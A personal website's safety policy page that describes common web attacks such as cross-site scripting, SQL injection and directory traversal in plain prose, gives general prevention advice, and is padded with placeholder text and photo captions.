Breadcrumb Page Navigation.
Home >> Policies >> Safety
The Safety Policy and Browser Security Statement.
policy effect and application.
Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh
euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad
minim veniam, quis nostrud exercitation ulliam corper suscipit lobortis nisl ut
aliquip ex ea commodo consequat. Duis autem veleum iriure dolor in hendrerit in
vulputate velit esse molestie consequat, vel willum lunombro dolore eu feugiat nulla
facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent
luptatum zzril delenit augue duis dolore te feugait nulla facilisi.
Lorem ipsum dolor sit amet, consectetuer adipiscing
elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat.
Web Site and Web Application Security.
Internet communication and Web sites have become, too often, security
and social risks for many visitors. This section lists some of the
technical exposures that pose a security risk for Web visitors.
Cross-Site Scripting (XSS).
Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in web applications which allow code injection by malicious
web users into the web pages viewed by other users. Often during an attack
“everything looks fine” to the end-user who may be subject to
unauthorized access, theft of sensitive data, and financial loss.
If an XSS vulnerability exists within a browser or a Web application
[including a Web page], users can be vulnerable to such exploits from
e-Mail, their local computer and/or from the remote Web server. XSS
vulnerabilities depend upon malicious JavaScript, or its equivalent,
code.
SQL (Structured Query Language) Injection.
SQL injection is a technique that exploits a security vulnerability
occurring in the database layer of an application. The vulnerability is
present when user input is either incorrectly filtered for string literal
escape characters embedded in SQL statements or user input is not strongly
typed and thereby unexpectedly executed. It is in fact an instance of a
more general class of vulnerabilities that can occur whenever one
programming or scripting language is embedded inside another.
SQL injection attacks can compromise the integrity and security of an
online database, e.g. databases used for storing customer information.
Malicious code does not need to be present on the user's computer to
affect the vulnerability.
However, on January 2008, tens of thousands of PCs were infected by
an automated SQL injection attack that exploited a vulnerability in
Microsoft SQL Server. These computers were used as an exploit vehicle.
Again 2008, an estimated 500,000 Web sites, including well respected
brand name aware Web sites, are infected with a SQL injection attack
that can take over the user's personal computer simply by the user
visiting an infected Web site. Such exploits can occur without any
visible knowledge that such an attack against the user's personal
computer has occurred. A multiple-strike attack kit is downloaded to
the visitor's PC. The kit tries eight different exploits, and if it
finds one that works, it hijacks the user's computer system. Again,
such exploits against personal computers rely upon some form of
JavaScript.
File Inclusion.
Remote File Inclusion attacks allow malicious users to run their own
PHP code on a vulnerable website. The attacker is allowed to include his
own malicious code in the space provided for PHP programs on a Web page.
These types of attacks can only occur on PHP Web sites.
Code Execution.
Arbitrary code execution attack is a type of attack that enables an
intruder to run arbitrary code on the target machine from inside a Web
page or Web application. Again, these types of attacks rely on malicious
forms of JavaScript that attack a user's computer system.
LDAP (Lightweight Directory Access Protocol) Injection.
Simply stated, LDAP, Lightweight Directory Access Protocol, is an
Internet protocol that e-Mail and other programs use to look up information
from a server. LDAP Injection is an attack used to exploit web based
applications that construct LDAP statements based on user input. Such
attacks can compromise user data sent or stored on the affected Web server
or Web site.
Cross Frame Scripting.
With Dynamic HTML (DHTML), content in different windows and frames
can interact in powerful ways by scripting with the object model. However,
since a browser can simultaneously display unrelated documents in its
various windows and frames, certain rules must be enforced to protect
data integrity and privacy of information.
Cross frame scripting exploits involve Web pages that use frames
wherein a legitimate site is displayed in one frame and where a malicious
site is presented within another frame. The malicious frame will generally
be an area of the Web content page that requests personal user information
and sensitive data.
However, the malicious frame can be used to deliver malicious code to
the user's computer without the user's knowledge. The malicious code is
transported automatically to the user's system merely by the user opening
such a Web page within their Web browser. Such a frame can be designed
to any dimension and can be as small as 1 pixel by 1 pixel and be attached
to what appears to be a legitimate hyperlink.
CRLF (Carriage Return Line Feed) Injection.
CRLF [Carriage Return Line Feed] injection attacks are most often used
to divert and obfuscate an attack against a Web site or Web server that,
in turn, can mount an attack against the Web visitor's computer. CRLF
attacks can also be used to compromise e-Mail submission forms and
anonymous e-Mail services.
Directory Traversal.
A directory traversal (or path traversal) is to exploit insufficient
security validation / sanitization of user-supplied input file names, so
that characters representing "traverse to parent directory" are passed
through to the file APIs.
The goal of this attack is to order an application to access a computer
file that is not intended to be accessible. This attack exploits a lack
of security (the software is acting exactly as it is supposed to) as
opposed to exploiting a bug in the code.
Directory traversal is trickier to prevent than it might seem. A
“filter out known bad characters” protection strategy is
likely to fail.
There are many other factors involved that would determine whether a
directory traversal would actually work. However, if the application does
not validate the legitimacy of such parameters, it is quite likely that
attackers may have some wiggle room to exploit this functionality for
malicious purposes.
XPath (Cross Path) Injection.
XPath Injection is an attack technique used to exploit web sites that
construct XPath queries from user-supplied input.
XPath 1.0 is a language used to refer to parts of an XML document.
It can be used directly by an application to query an XML document, or
as part of a larger operation such as applying an XSLT transformation to
an XML document, or applying an XQuery to an XML document.
An attacker can inject XPath expressions. The attack can result in
having the attacker logged in (as the first user listed in the XML document),
although the attacker did not provide any valid user name or password.
URL (Uniform Resource Locator) Redirection.
URL/URI (Uniform Resource Identifier) redirection is a technique used
to redirect the Web browser to a specific URL address. URI redirection
can be used within the code behind of a framework to simplify Web page
addresses. However, redirection can also be used to send the Web visitor
to a malicious Web site or content page.
Prevention.
Prevention of and protection against malicious Web attacks is
multi-faceted. Overall secure protection is dependent upon the Web
content developer, the Web server and the client computer.
The Web Developer.
It is the Web developer's responsibility to serve as the first line
of defense against malicious Web attacks against the site's visitors.
Vulnerabilities can be created by improper use and structure of the
code and script created by the developer. This, also, includes improper
configuration of the site's framework and any databases used.
The Web Server.
The Web server is the computer or hosting company on which the Web
content is hosted and served to the visitor's computer.
The Web server must be properly configured and that the latest
security updates are installed. No Web developer should assume that a
hosting company or even the developer's own internal IT specialists have done so. The
Web developer must assume responsibility to test the content that such
security updates and proper configuration of the server exist.
The Client Computer.
The client computer is the computer used by the Web visitor whether
or not the computer is workstation, standalone desktop or laptop
computer or any device used to access the Internet.
The Operating System.
The operating system of both server and client must be kept updated
with the latest security and software patches and updates.
The Web Browser.
The manufacturer of the modern Web browser has assumed responsibility
to provide a framework that attempts to minimize exposure to security
threats. Browsers must be kept updated on all systems with the browser's
latest software and updates.
Anti-virus, Spyware and Firewall Applications.
These security application must be installed, configured
properly and updated regularly. The application should be configured to
check for updated definition files on a daily basis. System scans should
be scheduled and conducted daily of the critical system files. Weekly
entire system scans of all hard drives should be scheduled. Additionally,
they need to be configured to interface with the e-Mail client.
Miscellaneous Applications and Frameworks.
Miscellaneous software applications that are used to
connect to the Internet or are used to interact with any Web site or
Web application need to be kept updated. These types of application
include media players, flash players and content readers.
The Content Owner.
Legal responsibility and subsequent liability exposure resides with
the owner of the Web site and Web application. Ownership can be diverse
particularly if the copyright owner is different from that, for example,
of the firm or individuals who profit from the Web site.
If you have any questions regarding the Boinkin Safety Policy, please
e-Mail that boinkin guy.
End of the Safety Policy Main Content.
.
Every Picture Tells a Story.
Beauty.
What stories may be told by the photography on this site
or what the imagery represents—.
Is personal and a story of itself.
JavaScript and Web Applications.
JavaScript is a scripting language that is widely used for
client-side execution on Web sites and Web applications.
Client-side scripts are those scripts embedded into a Web page that
will run on the Web visitor's (Client) computer (Side).
The majority of malicious Web attacks and vulnerabilities depend
upon the use of JavaScript to mount an attack.
JavaScript is both overused and poorly implemented within many Web
sites and applications. This dramatically increases exposure of the content
and its vulnerability for use in mounting attacks.
The first line of defense in mitigating potential of most Web site
and Web application attacks falls onto the Web developer of the content
and application.
Two basic rules apply. First, keep it simple and stupid. Unless there
is a functional need for it, don't do it. Secondly, know what to hell
you are doing.
A Look and a Smile.
Every Picture Tells a Story.
Database Construction, Configuration and
Deployment.
Use of databases for sensitive information within Web sites and
applications have become increasingly exposed to attacks. Such
exposure extends to any deployed server database whether accessible via
Web application or not.
Database security in development, deployment and access is too often
overlooked by the inexperienced Web developer. Both servers and databases
need rigorous testing to ensure integrity and security. In turn, both
need to be continually monitored for any potential breaches in security.
Construction, Configuration?
God Knows what God is Doing.
Security Compliance.
Security compliance for Web sites and Web applications is a legal
necessity. Outside of the more specialized compliance requirements of the
Health Insurance Portability and Accountability Act [HIPPA] or the
Sarbanes-Oxley Act [SOX], two legal requirements apply to a great
many Web sites: The Child Online Privacy Protection Act [COPPA] and the
Payment Card Industry Data Security Standard [PCI DSS].
Beyond security, the Americans with Disabilities Act [ADA] can impact
Web sites and bears a legal responsibility of compliance.
Such requirements and solutions are not built into browsers nor are
they part of any Web development application.
Responsibility and implementation of the legal requirements rests
with the owner of the content.
Additionally, unpublished legal requirements that must be met by any
social networking content and adult Web sites are becoming increasingly
necessary.
Systems Risk Assessment.
In Comparison, Who Cares.
Ninety-eight Percent of Home Computers May Be
at Risk.
Security researchers working for Danish firm Secunia said that fewer
than two per cent of home PCs that had its PSI (Personal Software Inspector)
program installed were running fully-patched software.
The company warned that out-of-date software could often be vulnerable
to recently discovered flaws in the coding, which could let cybercriminals
infect or attack a PC.
Computers that lack security updates for applications and its
operating system are vulnerable to exploits and malicious attacks.
Wired.
Regardless of How or Why You are Wired, Stay Safe.
Microsoft Windows 7 Ultra Secure
Black Box Edition.
Price: $5,695.00 USD.